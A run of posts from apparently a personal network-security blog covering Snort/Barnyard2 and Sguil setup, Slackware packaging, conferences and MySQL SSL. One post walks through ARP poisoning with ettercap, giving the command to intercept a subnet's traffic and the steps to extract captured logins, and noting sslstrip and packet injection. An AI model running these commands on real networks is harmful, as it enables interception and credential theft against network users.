A quick search revealed that I had to remove the ip_queue module. <a href="http://global-security.blogspot.com/" target="_blank">JJ Cummings</a> on the #snort channel pointed out to me that NFQ is the more recent option than IPQ. I am using Slackware-current, so even though it is a maintained distribution it is also not surprising that I was using an older option. Slackware also did not have a couple of the required libraries to compile DAQ with support for NFQ, so I went to Slackbuilds.org to get the files allowing me to create Slackware packages for <a href="http://slackbuilds.org/repository/13.37/libraries/libnetfilter_queue/" target="_blank">libnetfilter_queue</a> and <a href="http://slackbuilds.org/repository/13.37/libraries/libnfnetlink/" target="_blank">libnfnetlink</a>.<br />
<br />
Once I got the new packages installed, made sure the ip_queue module wasn't loaded, recompiled DAQ to support NFQ, and changed my Snort init to use <span style="font-family: "Courier New",Courier,monospace;">--daq nfq</span>, my inline Snort was working once again.<br />
<br />
Next, I updated from Barnyard-0.2.0.<br />
<br />
<tt>$ barnyard2 -V<br /><br /> ______ -*> Barnyard2 <*-<br /> / ,,_ \ Version 2.1.10-beta2 (Build 266) TCL<br /> |o" )~| By Ian Firns (SecurixLive): http://www.securixlive.com/<br /> + '''' + (C) Copyright 2008-2011 Ian Firns <firnsy@securixlive.com><br /></firnsy@securixlive.com></tt><br />
<br />
Barnyard2 is needed to process Snort's newer output mode, unified2. My snort.conf changed from:<br />
<br />
<tt>output log_unified: filename unified.log, limit 128</tt><br />
<br />
to:<br />
<br />
<tt>output unified2: filename unified.log, limit 128</tt><br />
<br />
When I got Barnyard2 up and running, it was obviously not successfully processing the unified2 files from Snort. Barnyard2 kept repeating the following error as it tried to process the files.<br />
<br />
<tt>WARNING: No function defined to read header.</tt><br />
<br />
I found a thread on the <a href="http://seclists.org/snort/2010/q1/818" target="_blank">snort-users list</a> that indicated Barnyard2 was getting a file type it wasn't expecting, which made sense considering the warning message. This issue gave me more problems than it should have and I eventually realized it was because of an error in my barnyard.conf file. The input is supposed to read "<span style="font-family: "Courier New",Courier,monospace;">input unified2</span>" but I had somehow managed to include a colon after "input". Once I fixed that line, Barnyard2 started working, with alerts being properly processed and showing up in Sguil once again.<br />
<br />
The next update will be to go from Sguil-0.7.0 to Sguil-0.8.0.Nathaniel Richmondhttp://www.blogger.com/profile/16307898781407130985noreply@blogger.com0tag:blogger.com,1999:blog-297187840164530151.post-77820324454498997322012-01-04T10:45:00.001-05:002012-01-04T10:45:50.413-05:00Flocon 2012<a href="http://www.cert.org/flocon/" target="_blank">Flocon 2012</a> is January 9-12, which is next week. It's fairly late, but I believe registration is still open. The <a href="http://www.cert.org/flocon/schedule/all.html" target="_blank">schedule</a> includes speakers from many organizations and looks quite interesting. I will be attending and am looking forward to it. <br />
<br />
Happy New Year!Nathaniel Richmondhttp://www.blogger.com/profile/16307898781407130985noreply@blogger.com0tag:blogger.com,1999:blog-297187840164530151.post-45754261992980477192011-09-14T18:32:00.003-04:002011-09-17T20:21:19.872-04:00Recent Advances in Intrusion Detection 2011<br />
For anyone still following despite my infrequent posting, I will be going to the <a href="http://www.raid2011.org/">International Symposium on Recent Advances in Intrusion Detection</a> next week. I haven't made time to attend a conference in quite a while, so I'm looking forward to it.<br />
<br />
If anyone that knows me is attending and interested in getting together, let me know. If you know me either online or in meatspace, hopefully that means you know how to reach me.<br />
<br />
This post doubled my number of blog posts to date for 2011. The most likely next post will be covering anything interesting from the conference. Beyond that, I don't anticipate much posting activity in the near future for a number of reasons.Nathaniel Richmondhttp://www.blogger.com/profile/16307898781407130985noreply@blogger.com0tag:blogger.com,1999:blog-297187840164530151.post-48934466181694858502011-02-28T21:01:00.006-05:002011-03-05T11:44:09.734-05:00Using ettercap for ARP poisoning<a href="http://ettercap.sourceforge.net/">Ettercap</a> is certainly nothing new, and there is plenty of documentation around to see how to use it, but I was sitting here goofing around and decided to record my results. I am not advocating this type of thing on a public network, and ARP poisoning or other attacks often fall afoul of terms of service for public and private networks, and may even be illegal in some jurisdictions.<br />
<br />
First, I looked at my default route.<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">$ route -n<br />
Kernel IP routing table<br />
Destination Gateway Genmask Flags Metric Ref Use Iface<br />
10.71.0.0 0.0.0.0 255.255.255.0 U 2 0 0 wlan0<br />
0.0.0.0 10.71.0.1 0.0.0.0 UG 0 0 0 wlan0</span><br />
<br />
<span style="font-family: inherit;">To sniff the whole subnet, I'll want to do some ARP poisoning to send all traffic to/from the default route through my system.</span><br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">$ sudo ettercap -i wlan0 -T -M arp:remote /10.71.0.1/ //</span><br />
<br />
You can also use "// //" to designate ARP poisoning no matter what source and destination ettercap sees. The "-T" tells ettercap to use the text interface, which is still interactive. There is also a curses-based interface, "-C", and GTK with "-G" though it has always seemed less reliable to me than the others. The curses interface is actually pretty nice.<br />
<br />
Once you run the command, ettercap should enumerate hosts and you will start seeing a bunch of traffic information scrolling through your console. How do we know if it's actually working? If you see non-broadcast traffic destined for other hosts, it will be obvious and you will know you're successfully sniffing all the traffic.<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjUdtO5yAc6j4SLWDeKEnxaMFavi69YMO7tObr2zUawwQbbPFAcpcOE1NMgqGQp76XigrjAEUfPKIoT-j7f8Lk3G-WnGy_bwaybOfeFIQMuFDje8EVb9QTG3KNmhcm4JrQHa9xjZiAZ6GJ/s1600/etherape-ettercap-scaled.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="193" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjUdtO5yAc6j4SLWDeKEnxaMFavi69YMO7tObr2zUawwQbbPFAcpcOE1NMgqGQp76XigrjAEUfPKIoT-j7f8Lk3G-WnGy_bwaybOfeFIQMuFDje8EVb9QTG3KNmhcm4JrQHa9xjZiAZ6GJ/s320/etherape-ettercap-scaled.png" width="320" /></a>Another fun way is by opening etherape to see a realtime visualization of the traffic. If you are seeing typical non-broadcast traffic like HTTP, HTTPS, that's an indicator that you're successfully ARP poisoning. You can also get a quick idea if there are particular hosts getting a lot of traffic activity. I've seen the typical sites like Facebook, Amazon, Akamai, and LLNW, but also more interesting sites that are easily identifiable as VPN concentrators, banks, and more.<br />
<br />
You can also of course use various tools including ettercap with the "-w" option to write traffic to a file and review at my leisure to look for interesting data. Ettercap also has an interesting utility to automatically grab usernames and passwords. From the man page:<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;"> -L, --log <logfile><br />
Log all the packets to binary files. These files can be parsed<br />
by etterlog(8) to extract human readable data. With this option,<br />
all packets sniffed by ettercap will be logged, together with<br />
all the passive info (host info + user & pass) it can collect.<br />
Given a LOGFILE, ettercap will create LOGFILE.ecp (for packets)<br />
and LOGFILE.eci (for the infos).</logfile></span><br />
<br />
If you didn't run this with ettercap originally, you can also run it on a saved packet capture.<br />
<br />
<div style="font-family: "Courier New",Courier,monospace;">$ ettercap -r hotel.raw -L hotel<br />
<br />
ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA<br />
<br />
Please select an User Interface<br />
<br />
$ ls hotel*</div><div style="font-family: "Courier New",Courier,monospace;">hotel.eci hotel.ecp hotel.raw<br />
<br />
$ etterlog -a hotel.eci </div><div style="font-family: "Courier New",Courier,monospace;"><br />
etterlog NG-0.7.3 copyright 2001-2004 ALoR & NaGA<br />
<br />
Log file version : NG-0.7.3<br />
Timestamp : Wed Feb 16 14:20:57 2010<br />
Type : LOG_INFO<br />
<br />
Number of hosts (total) : 248<br />
<br />
Number of local hosts : 30<br />
Number of non local hosts : 0<br />
Number of gateway : 0<br />
<br />
Number of discovered services : 240<br />
Number of accounts captured : 4</div><br />
<div style="font-family: "Courier New",Courier,monospace;">$ etterlog -p hotel.eci<br />
<br />
74.125.93.191 TCP 80 USER: fakeuser PASS: fakepasswd</div><br />
I changed the data above and of course most sites these days are hopefully forcing encrypted logins.<br />
<br />
These days, many sites can be hosted on one IP or virtual server. If you're not catching the DNS or HTTP request specifically before the login that was captured, the easiest way to determine which site on a specific IP was being visited would be opening up the packet capture with a tool like Wireshark, using a filter for the IP, then looking at the actual web traffic for the site's name. Looking in Wireshark, I can see the GET immediately after the TCP handshake.<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">GET /members/bbs/showthread.php HTTP/1.1</span><br />
<span style="font-family: "Courier New",Courier,monospace;">Host: www.fakedomain.com</span><br />
<br />
<span style="font-family: inherit;">This really just scratches the surface of what you can do with ettercap and other network tools. ARP poisoning still works, particularly on public networks, and many people log in to many services that can be easily compromised through sniffing (I write while sitting in an airport on public WiFi logged into my blogger account).</span> A relatively recent high profile example was when the Metasploit site was <a href="http://www.zdnet.com/blog/security/metasploit-projects-site-hijacked-through-arp-poisoning/1242">briefly hijacked</a> by successful ARP poisoning.<br />
<br />
There are numerous other attacks besides sniffing that could succeed when ARP poisoning, many involving redirecting traffic or injecting malicious content. For instance, you can use something like <a href="http://www.thoughtcrime.org/software/sslstrip/">sslstrip</a> to redirect all HTTPS traffic to HTTP, grabbing credentials in the process. You could also inject content directly using etterfilter.<br />
<br />
<div style="font-family: "Courier New",Courier,monospace;"> DESCRIPTION<br />
The etterfilter utility is used to compile source filter files into<br />
binary filter files that can be interpreted by the JIT interpreter in<br />
the ettercap(8) filter engine. You have to compile your filter scripts<br />
in order to use them in ettercap. All syntax/parse errors will be<br />
checked at compile time, so you will be sure to produce a correct<br />
binary filter for ettercap.</div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqIo1wtkFfPQyKbv8edSqZC1mrhbr-i0zAphObJUhaFaZi8w4Bfi97UwSiusQR1wj1dHiyad7Naozw4hzEAF7ye_F4w3-tNcweyUYWXigOT0ncsnpz5QROZoiwOj_U5Ix85i2HlyapnCYZ/s1600/pwned.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"></a><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqIo1wtkFfPQyKbv8edSqZC1mrhbr-i0zAphObJUhaFaZi8w4Bfi97UwSiusQR1wj1dHiyad7Naozw4hzEAF7ye_F4w3-tNcweyUYWXigOT0ncsnpz5QROZoiwOj_U5Ix85i2HlyapnCYZ/s1600/pwned.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqIo1wtkFfPQyKbv8edSqZC1mrhbr-i0zAphObJUhaFaZi8w4Bfi97UwSiusQR1wj1dHiyad7Naozw4hzEAF7ye_F4w3-tNcweyUYWXigOT0ncsnpz5QROZoiwOj_U5Ix85i2HlyapnCYZ/s1600/pwned.jpg" /></a></div>Using etterfilter you can inject new packets, replace data in packets, and more. If someone is visiting what they consider a known safe site, replacing data or injecting malicious packets can be quite successful. At a previous job, we had a non-production network for attack and defend fun, and with etterfilter I was able to <a href="http://www.irongeek.com/i.php?page=security/ettercapfilter">replace all image requests</a> by one of my colleagues' browser and instead have it request the image to the left.<br />
<br />
Although my example above is obviously on a wireless network as shown by using the wlan0 interface, you can easily perform ARP poisoning on a local wired segment. There are also a number of ways to help detect or prevent poisoning with your network appliances or software.<br />
<br />
Finally, ettercap also has a number of interesting plugins available.<br />
<span style="font-family: "Courier New",Courier,monospace;">$ ettercap -P list<br />
<br />
ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA<br />
<br />
<br />
Available plugins :<br />
<br />
arp_cop 1.1 Report suspicious ARP activity<br />
autoadd 1.2 Automatically add new victims in the target range<br />
chk_poison 1.1 Check if the poisoning had success<br />
dns_spoof 1.1 Sends spoofed dns replies<br />
dos_attack 1.0 Run a d.o.s. attack against an IP address<br />
dummy 3.0 A plugin template (for developers)<br />
find_conn 1.0 Search connections on a switched LAN<br />
find_ettercap 2.0 Try to find ettercap activity<br />
find_ip 1.0 Search an unused IP address in the subnet<br />
finger 1.6 Fingerprint a remote host<br />
finger_submit 1.0 Submit a fingerprint to ettercap's website<br />
gre_relay 1.0 Tunnel broker for redirected GRE tunnels<br />
gw_discover 1.0 Try to find the LAN gateway<br />
isolate 1.0 Isolate an host from the lan<br />
link_type 1.0 Check the link type (hub/switch)<br />
pptp_chapms1 1.0 PPTP: Forces chapms-v1 from chapms-v2<br />
pptp_clear 1.0 PPTP: Tries to force cleartext tunnel<br />
pptp_pap 1.0 PPTP: Forces PAP authentication<br />
pptp_reneg 1.0 PPTP: Forces tunnel re-negotiation<br />
rand_flood 1.0 Flood the LAN with random MAC addresses<br />
remote_browser 1.2 Sends visited URLs to the browser<br />
reply_arp 1.0 Simple arp responder<br />
repoison_arp 1.0 Repoison after broadcast ARP<br />
scan_poisoner 1.0 Actively search other poisoners<br />
search_promisc 1.2 Search promisc NICs in the LAN<br />
smb_clear 1.0 Tries to force SMB cleartext auth<br />
smb_down 1.0 Tries to force SMB to not use NTLM2 key auth<br />
stp_mangler 1.0 Become root of a switches spanning tree</span>Nathaniel Richmondhttp://www.blogger.com/profile/16307898781407130985noreply@blogger.com1tag:blogger.com,1999:blog-297187840164530151.post-59683110826238903492010-12-02T21:30:00.000-05:002010-12-02T21:30:08.259-05:00Using slackbuilds.org to create Slackware packagesSorry for the long posting hiatus but don't expect it to end. I just don't have a lot of time or material to devote to the blog right now.<br />
<br />
I recently wanted to upgrade Postfix on my Slackware mail server. I used to use packages from LinuxPackages.net for unofficial packages, but the site has gotten less active and always had a reputation for varying package quality. My preference is using the <a href="http://slackbuilds.org/">SlackBuilds</a> to build my own packages. It's fairly simple to download their build script, edit as needed, then build a Slackware package from source.<br />
<br />
Since Postfix is not available from Slackware official repositories, I downloaded the <a href="http://slackbuilds.org/repository/13.1/network/postfix/">SlackBuild files</a> and then the Postfix source.<br />
<pre>$ wget http://postfix.cs.utah.edu/source/official/postfix-2.6.8.tar.gz
$ wget http://slackbuilds.org/slackbuilds/13.1/network/postfix.tar.gz
$ tar xvzf postfix.tar.gz
$ ls postfix/
README postfix-2.6.8.tar.gz postfix.info slack-desc
doinst.sh postfix.SlackBuild* rc.postfix</pre>I am using Cyrus-SASL, so it was important for me to note the following from the SlackBuild Postfix page.<br />
<blockquote>This script builds postfix with support for Dovecot SASL but does not<br />
include any support for Cyrus-SASL. If you need to enable support for<br />
Cyrus see SASL_README in the source code.</blockquote>I also noted the following from the postfix.SlackBuild file itself.<br />
<pre># Postfix unfortunately does not use a handy ./configure script so you
# must generate the makefiles using (what else?) "make makefiles". The
# following includes support for TLS and SASL. It should automatically
# find PCRE and DB3 support. The docs have information for adding
# additional support such as MySQL or LDAP.</pre>I changed the "make makefile" lines from:<br />
<pre>make makefiles \
CCARGS='-DUSE_SASL_AUTH -DDEF_SERVER_SASL_TYPE=\"dovecot\" -DUSE_TLS' \
AUXLIBS="-lssl -lcrypto"</pre>to:<br />
<pre>make makefiles CCARGS="-DUSE_SASL_AUTH -DUSE_CYRUS_SASL -DHAS_PCRE \
-I/usr/local/include/sasl -I/usr/include" \
AUXLIBS="-L/usr/local/lib -lsasl2 -L/usr/lib -lpcre"</pre>This added Cyrus-SASL support and also fixed a problem I was having with it finding PCRE. I also changed the VERSION variable to 2.6.8 since the postfix.SlackBuild file was for 2.6.1. After the changes, all I have to do is run the postfix.SlackBuild file then use "upgradepkg" on the resulting postfix-2.6.8-iX86-1_SBo.tgz package. (Note that official packages use xz for compression now, not gzip, so they will have the extension txz).<br />
<br />
The next package I will create using SlackBuilds is cyrus-imapd since it also is not included in Slackware. Cyrus-SASL actually has an official package, but I I've been running Cyrus for so long that I have always installed it from source. I don't remember if that is because it wasn't available as a package back in the day or just because I was using some non-standard options.Nathaniel Richmondhttp://www.blogger.com/profile/16307898781407130985noreply@blogger.com0tag:blogger.com,1999:blog-297187840164530151.post-7774080219344935912010-03-14T14:37:00.006-04:002010-06-12T18:27:20.521-04:00March Slackware-current: libblkid.so.1 The Slackware-current updates from March 1, 2010, included updates to both the e2fsprogs package and the util-linux-ng package. An important thing to note is that libblkid was moved out of e2fsprogs and into util-linux-ng. If you search the web for libblkid.so.1, slackpkg, util-linux-ng, and e2fsprogs, you will see various forum posts about not being able to boot. This is because libblkid.so.1 is required to mount and the updates included a new kernel, which meant a lot of people updated then rebooted without having util-linux-ng installed. Booting without the library will get you error messages about libblkid.so.1 not being found when the system tries to mount the drives.<br />
<pre>$ man libblkid
LIBBLKID(3) LIBBLKID(3)
NAME
libblkid - block device identification library
SYNOPSIS
#include <blkid blkid.h="">
cc file.c -lblkid
DESCRIPTION
The libblkid library is used to identify block devices (disks) as to
their content (e.g. filesystem type) as well as extracting additional
information such as filesystem labels/volume names, unique identi-
fiers/serial numbers, etc.</blkid> </pre>If you don't already have util-linux-ng installed then make sure to install it before rebooting since the update to e2fsprogs will remove libblkid.<br />
<pre>$ sudo slackpkg update
---snip---
$ sudo slackpkg install util-linux-ng
---snip---
$ sudo slackpkg install-new
---snip---
$ sudo slackpkg upgrade-all</pre>If you get stuck because you ran upgrade-all, don't have util-linux-ng installed, then rebooted for the kernel update, you can boot to the Slackware install CD or DVD so you can install the old version of e2fsprogs or the new util-linux-ng. This will allow you to boot normally then fix whatever is needed, such as installing the new util-linux-ng and/or upgrading e2fsprogs.Nathaniel Richmondhttp://www.blogger.com/profile/16307898781407130985noreply@blogger.comtag:blogger.com,1999:blog-297187840164530151.post-64520621825063165502010-03-13T15:11:00.004-05:002010-03-14T14:44:20.283-04:00Customizing Slackware Tcl Package for SguilMost distributions these days are configuring their Tcl packages with <tt>--enable-threads</tt> as a default. Slackware-current switched some months back with the following in the ChangeLog.txt.<br />
<br />
<pre>+--------------------------+
Mon Dec 7 02:13:13 UTC 2009
d/ruby-1.9.1_p243-i486-3.txz: Rebuilt.
Added an explicit --enable-pthread. This is mostly to make sure that we get
the expected option set from future releases of Ruby -- it appears that not
only is --enable-pthread the default in ruby-1.9.1, but trying to use
--disable-pthread doesn't work. Furthermore, Ruby and Tcl/Tk no longer work
together unless both Ruby and Tcl/Tk are compiled with thread support.
Compiling Tcl/Tk with thread support has caused some problems in the past.
If a threaded Tcl app tries to fork(), it will hang, but by now most affected
Tcl apps (such as eggdrop) should have patches available.
Anyway, this should fix the issues with Ruby and Tk. Please test it, and
report any other problems that arise.
tcl/tcl-8.5.8-i486-1.txz: Upgraded.
Compiled using --enable-threads, since Ruby requires it to work with Tk.
tcl/tclx-8.4-i486-3.txz: Rebuilt.
Recompiled using --enable-threads.
tcl/tix-8.4.3-i486-2.txz: Rebuilt.
Recompiled using --enable-threads.
tcl/tk-8.5.8-i486-1.txz: Upgraded.
Compiled using --enable-threads, since Ruby requires it to work with Tk.</pre><pre>+--------------------------+ </pre>The Sguil daemon <a href="http://nsmwiki.org/Sguil_FAQ#Sguild_complains_about_threading_issues.2C_then_dies" target="_blank">will not work with threaded Tcl</a>, so to fix this you need to build a package for the distribution of your choice with the <tt>--disable-threads</tt> configure option. In Slackware and most other distributions, it is fairly simple to customize a package.<br />
<br />
Download Tcl from the <a href="ftp://ftp.slackware.com/pub/slackware/slackware-current/source/tcl/tcl/" target="_blank">source directory</a> on the Slackware mirror of your choice. It should include a slack-desc file, a tcl.SlackBuild file, and the Tcl source. Modify the tcl.SlackBuild file to replace <tt>--enable-threads</tt> with <tt>--disable-threads</tt>.<br />
<pre>./configure \
--prefix=/usr \
--libdir=/usr/lib${LIBDIRSUFFIX} \
--enable-shared \
--disable-threads \
--enable-man-symlinks \
--enable-man-compression=gzip \
${CONFARGS} \
--build=$ARCH-slackware-linux</pre>You may also want to modify the slack-desc to note that this is a non-threaded version. Then build the new package.<br />
<pre>$ sh tcl.SlackBuild
---snip---
Slackware package /tmp/tcl-8.5.8-i486-1.txz created.</pre>As you see, the package will get written to /tmp by default. Now replace the threaded version with the new non-threaded version.<br />
<pre>$ sudo upgradepkg --reinstall /tmp/tcl-8.5.8-i486-1.txz
+==============================================================================
| Upgrading tcl-8.5.8-i486-1 package using /tmp/tcl-8.5.8-i486-1.txz
+==============================================================================
Pre-installing package tcl-8.5.8-i486-1...
Removing package /var/log/packages/tcl-8.5.8-i486-1-upgraded-2010-03-13,20:03:22...
Verifying package tcl-8.5.8-i486-1.txz.
Installing package tcl-8.5.8-i486-1.txz:
PACKAGE DESCRIPTION:
# tcl (Tool Command Language)
#
# Tcl, developed by Dr. John Ousterhout, is a simple to use text-based
# script language with many built-in features which make it especially
# nice for writing interactive scripts.
#
# This is a version customized by nr that uses --disable-threads.
#
Executing install script for tcl-8.5.8-i486-1.txz.
Package tcl-8.5.8-i486-1.txz installed.
Package tcl-8.5.8-i486-1 upgraded with new package /tmp/tcl-8.5.8-i486-1.txz.
</pre>Nathaniel Richmondhttp://www.blogger.com/profile/16307898781407130985noreply@blogger.com0tag:blogger.com,1999:blog-297187840164530151.post-80014262123564044842010-01-01T14:15:00.002-05:002010-01-01T14:59:21.604-05:00Security News and Reporting Gets a New BlogBrian Krebs announced on 24 December that his last day at <a href="http://voices.washingtonpost.com/securityfix/2009/12/farewell_2009_and_the_washingt.html" target="_blank"> The Washington Post Company would be 31 December</a>. Krebs will continue to blog at <a href="http://www.krebsonsecurity.com/" target="_blank">Krebs on Security</a>. He has a good history of security reporting, and generally concentrates on investigative reporting and analysis.<br />
<br />
He notes:<br />
<blockquote>With a few exceptions, I will continue to eschew chasing the security story-of-the day, as there are plenty of sites you can go for that. My focus will remain on publishing information and reporting that you won’t find anywhere else – and with a minimum of editorializing.<br />
</blockquote>I see this as a good description of his work and his first story, <a href="http://www.krebsonsecurity.com/2009/12/virus-scanners-for-virus-authors/" target="_blank">Virus Scanners for Virus Authors</a>, is a good example of the type of reporting he has handled over recent years.Nathaniel Richmondhttp://www.blogger.com/profile/16307898781407130985noreply@blogger.com0tag:blogger.com,1999:blog-297187840164530151.post-36298587196728213832009-11-19T06:18:00.013-05:002009-11-19T14:19:29.875-05:00SNAFU: Peer-to-peer and Sensitive InformationA lot of people noticed the recent <a href="http://www.washingtonpost.com/wp-dyn/content/article/2009/10/30/AR2009103001959_pf.html" target="_blank">Congressional ethics probe</a> that was disclosed because a junior staff member put a sensitive document on her computer at home. Not surprisingly, her computer also had file-sharing software installed and she inadvertently was sharing the document on a peer-to-peer network. Some are calling for <a href="http://www.washingtonpost.com/wp-dyn/content/article/2009/10/30/AR2009103003749_pf.html" target="_blank">a review of congressional cybersecurity policies</a> after the breach. One thing to remember is that this sort of thing is not unique, new or surprising.<br />
<br />
<a href="http://blog.vorant.com/" target="_blank">David Bianco</a> <a href="http://blog.vorant.com/2006/06/laptop-encryption-i-have-better-idea.html" target="_blank">wrote about a similar topic in 2006</a> and covers the important points, though I would add that the problem also extends to personal systems, not just mobile devices. Whether the vulnerability is a mobile device that is easily lost or stolen (laptop, smart-phone, music player, etc), or a personal system running software that would never be allowed in a work environment, don't put sensitive information on systems that are difficult to control.Nathaniel Richmondhttp://www.blogger.com/profile/16307898781407130985noreply@blogger.com0tag:blogger.com,1999:blog-297187840164530151.post-14850122240880586442009-11-17T08:12:00.003-05:002009-12-13T15:31:15.929-05:00SANS WhatWorks in Incident Detection Summit 2009I am scheduled to be a part of several discussion panels at the <a href="http://www.sans.org/incident-detection-summit-2009/" target="_blank">SANS WhatWorks in Incident Detection Summit 2009</a> on 9-10 December. There are a lot of good speakers participating and the <a href="http://www.sans.org/incident-detection-summit-2009/agenda.php" target="_blank">agenda will cover many topics related to incident detection</a>. I believe there is still space available for anyone that is interested in attending.<br />
<br />
From SANS: <br />
<blockquote>Following the success of the 2008 and 2009 editions of the SANS WhatWorks in Forensics and Incident Response Summits, SANS is teaming with <a href="http://taosecurity.blogspot.com/" target="_blank">Richard Bejtlich</a> to create a practioner-focused event dedicated to incident detection operations. The SANS Incident Detection Summit will share tools, tactics, and techniques practiced by more than 40 of the world's greatest incident detectors in two full days of content consisting of keynotes, expert briefings, and dynamic panels.<br />
<br />
<a href="http://www.sans.org/incident-detection-summit-2009/" target="_blank">http://www.sans.org/incident-detection-summit-2009/</a><br />
</blockquote>Nathaniel Richmondhttp://www.blogger.com/profile/16307898781407130985noreply@blogger.com0tag:blogger.com,1999:blog-297187840164530151.post-38865463256286065262009-10-19T22:23:00.007-04:002009-10-21T09:11:54.492-04:00Hackintosh Dell Mini 9<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpQOtK2zivHcJ4tPca4Zy-NiBUMiN-4WHt3dv0N_rYWc58Gr7uP6L4XAi9vR3qHTYW6_GreFEO_Nl0Msfq0oNNJW4BuLsaqGM88XobBKtErzi1AlPPlh5cXRezl88gee4bpBLxDsAW4kIq/s1600-h/hackintosh9.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpQOtK2zivHcJ4tPca4Zy-NiBUMiN-4WHt3dv0N_rYWc58Gr7uP6L4XAi9vR3qHTYW6_GreFEO_Nl0Msfq0oNNJW4BuLsaqGM88XobBKtErzi1AlPPlh5cXRezl88gee4bpBLxDsAW4kIq/s400/hackintosh9.png" /></a><br />
</div>I have been playing with a Dell Mini 9 running Mac OS 10.5.8 for the past couple days. It's pretty nice for a tiny laptop. There are a few guides on the Internet showing how to set it up, including one on <a href="http://www.mydellmini.com/forum/mac-os-x-guides/3743-how-install-mac-os-x-dellefi-method.html" target="_blank">mydellmini.com</a> and another on <a href="http://gizmodo.com/5156903/how-to-hackintosh-a-dell-mini-9-into-the-ultimate-os-x-netbook" target="_blank">Gizmodo</a>.<br />
<br />
If you want a small laptop running Mac OSX, this is a pretty cool. The Dell outlet sometimes still has these laptops, but remember to factor in that they are old and need a larger SSD. Also take into account that installing even a retail copy of OSX on non-Apple hardware may violate their EULA.<br />
<div class="separator" style="clear: both; text-align: center;"><br />
</div>Nathaniel Richmondhttp://www.blogger.com/profile/16307898781407130985noreply@blogger.com0tag:blogger.com,1999:blog-297187840164530151.post-49375855686957818042009-10-12T02:55:00.005-04:002009-10-13T08:54:20.002-04:00Adding GeoIP to the Sguil ClientThis is a post I meant to publish months ago, but for some reason slipped off my radar. I was reading the Sguil <a href="http://nsmwiki.org/Sguil_Feature_Wish_List" target="_blank">wishlist</a> on <a href="http://nsmwiki.org/Main_Page" target="_blank">NSMWiki</a> and saw something that looked simple to implement. Here are a couple diffs I created after adding a menu item for GeoIP in sguil.tk and a proc for it in lib/extdata.tcl. All I did was copy the existing DShield proc and menu items, then edit as needed to change the URL and menu listings.<br />
<br />
I think it should work and I downloaded a pristine copy of the files before running diff since I've <a href="http://eatingsecurity.blogspot.com/2007/10/sguil-070-client-and-netbios-names.html" target="_blank">hacked Sguil files previously</a>, but no warranty is assumed or implied, et cetera.<br />
<br />
Ideally, I would love to help out and tackle some of the other items on the wishlist. My time constraints make it hard, but at least I now have a <a href="http://nsmwiki.org/Sguil_FAQ#Seriously.__Why_Tcl.3F" target="_blank">Tcl book</a>.<br />
<br />
sguil.tk<br />
<pre>2865a2866
> .ipQueryMenu add cascade -label "GeoIP Lookup" -menu $ipQueryMenu.geoIPMenu
2873a2875,2876
> menu $ipQueryMenu.geoIPMenu -tearoff 0 -background $SELECTBACKGROUND -foreground $SELECTFOREGROUND \
> -activeforeground $SELECTBACKGROUND -activebackground $SELECTFOREGROUND
2917a2921,2922
> $ipQueryMenu.geoIPMenu add command -label "SrcIP" -command "GetGeoIP srcip"
> $ipQueryMenu.geoIPMenu add command -label "DstIP" -command "GetGeoIP dstip"</pre>lib/extdata.tcl<br />
<pre>211a212,243
> proc GetGeoIP { arg } {
>
> global DEBUG BROWSER_PATH CUR_SEL_PANE ACTIVE_EVENT MULTI_SELECT
>
> if { $ACTIVE_EVENT && !$MULTI_SELECT} {
>
> set selectedIndex [$CUR_SEL_PANE(name) curselection]
>
> if { $arg == "srcip" } {
> set ipAddr [$CUR_SEL_PANE(name) getcells $selectedIndex,srcip]
> } else {
> set ipAddr [$CUR_SEL_PANE(name) getcells $selectedIndex,dstip]
> }
>
> if {[file exists $BROWSER_PATH] && [file executable $BROWSER_PATH]} {
>
> # Launch browser
> exec $BROWSER_PATH http://www.geoiptool.com/?IP=$ipAddr &
>
> } else {
>
> tk_messageBox -type ok -icon warning -message\
> "$BROWSER_PATH does not exist or is not executable. Please update the BROWSER_PATH variable\
> to point your favorite browser."
> puts "Error: $BROWSER_PATH does not exist or is not executable."
>
> }
>
> }
>
> }
></pre>Nathaniel Richmondhttp://www.blogger.com/profile/16307898781407130985noreply@blogger.com0tag:blogger.com,1999:blog-297187840164530151.post-30472011449471157352009-09-15T05:28:00.005-04:002009-09-16T23:31:15.105-04:00MySQL replication on RHELI recently configured MySQL for replication after first enabling SSL connections between the two systems that would be involved with replication. I have to say that MySQL documentation is excellent and all these notes are simply based on what is available on the MySQL site. I have included links to as many of the relevant sections of the documentation as possible.<br />
<br />
For reference, here is the MySQL manual on enabling SSL: <a href="http://dev.mysql.com/doc/refman/5.0/en/secure-using-ssl.html" target="_blank">5.5.7.2. Using SSL Connections</a><br />
<br />
Before beginning, it is a good idea to create a directory for the SSL output files and make sure all the files end up there.<br />
<br />
MySQL’s RHEL5 packages from mysql.com support SSL by default, but to check you can run:<br />
<br />
<hr align="center" color="blue" width="100%" /><pre>$ mysqld --ssl --help
mysqld Ver 5.0.67-community-log for redhat-linux-gnu on i686 (MySQL Community Edition (GPL))Copyright (C) 2000 MySQL AB, by Monty and others
This software comes with ABSOLUTELY NO WARRANTY. This is free software,
and you are welcome to modify and redistribute it under the GPL license
Starts the MySQL database server
Usage: mysqld [OPTIONS]
For more help options (several pages), use mysqld --verbose --help</pre><hr align="center" color="blue" width="100%" /><br />
